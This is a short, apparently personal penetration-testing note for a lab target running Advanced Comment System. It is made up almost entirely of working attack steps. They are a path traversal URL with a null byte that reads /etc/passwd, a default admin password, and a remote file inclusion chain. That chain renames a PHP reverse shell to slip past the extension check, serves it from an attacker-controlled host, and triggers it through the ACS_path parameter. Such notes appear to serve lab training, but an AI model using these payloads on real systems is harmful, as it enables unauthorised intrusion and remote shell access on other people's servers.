advanced_component_system

#Path traversal http://localhost/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 Default login page Default pass: admin https://10.11.1.8/internal/advanced_comment_system/admin.php? Reverse shell [1]use classic php-reverse-shell.php → shelly.php.config.php Modify host and listening port [2]Serve using python on port 80 (IMPORTANT!) [3]Trigger revshell https://10.11.1.8/internal/advanced_comment_system/index.php?ACS_path=http://192.168.119.177/shelly.php.config.php?%00 Important: - shell.php → adding the extension .config.php → shelly.php.config.php - ?%00 → question mark and null byte at the end of the string